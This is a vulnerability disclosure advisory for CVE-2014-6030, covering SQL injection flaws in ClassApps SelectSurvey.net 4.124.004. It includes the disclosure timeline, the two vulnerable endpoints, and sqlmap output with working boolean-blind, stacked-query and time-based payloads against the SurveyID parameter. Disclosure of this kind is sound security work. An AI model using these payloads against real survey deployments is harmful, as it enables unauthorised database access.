Details
==========
Software: ClassApps SelectSurvey.net
Description: Multiple SQL Injection Vulnerabilities
Version: 4.124.004
Homepage: https://www.classapps.com/SelectSurveyNETOverview.asp
Vendor Fix: 4.125.002
CVE: 2014-6030

Timeline
==========
Aug 28 2014 - Vendor Notified
Aug 28 2014 - CVE Requested
Aug 28 2014 - Vendor Response
Sep 01 2014 - CVE Assigned
Sep 01 2014 - Upgraded Version Released
Sep 17 2014 - Disclosure

Description
==========
SelectSurvey.net is a web-based survey application written in ASP.net
and C#. It is vulnerable to multiple SQL injection attacks, both
authenticated and unauthenticated. The authenticated vulnerability
resides within the file upload script, as the parameters are not
sanitized prior to being placed into the SQL query. ClassApps had
previously listed 'SQL injection protection' as a feature and did have
several functions in place to attempt to prevent such attacks but due to
using a "blacklisting" approach, it is possible to circumvent these
functions. These functions are used elsewhere throughout the application
to protect GET request variables but are not sufficient. Only this
specific version of the application has been tested but it is highly
likely these vulnerabilities exist within prior versions. It has not
been confirmed that these vulnerabilities are fixed. The vendor stated
that they would be fixed in this new release however, they do not allow
download of the code unless you are a customer so fixes have not been
verified.

Examples
==========
/survey/ReviewReadOnlySurvey.aspx?ResponseID=<num>&SurveyID=[SQLi]
(unauthenticated)
/survey/UploadImagePopupToDb.aspx?ResponseID=<num>&SurveyID=[SQLi]
(authenticated)

sqlmap identified the following injection points:
---
Place: GET
Parameter: SurveyID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ResponseID=1&SurveyID=1' AND 4002=4002 AND 'dLur'='dLur

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: ResponseID=1&SurveyID=1'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: ResponseID=1&SurveyID=1' WAITFOR DELAY '0:0:5'--
---
[14:01:39] [INFO] testing Microsoft SQL Server
[14:01:39] [INFO] confirming Microsoft SQL Server
[14:01:39] [INFO] the back-end DBMS is Microsoft SQL Server
[14:01:39] [INFO] fetching banner
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS operating system: Windows 7 Service Pack 1
back-end DBMS: Microsoft SQL Server 2008
banner:
---
Microsoft SQL Server 2008 R2 (SP2) - 10.50.4000.0 (X64)
    Jun 28 2012 08:36:30
    Copyright (c) Microsoft Corporation
    Enterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601:
Service Pack 1)
---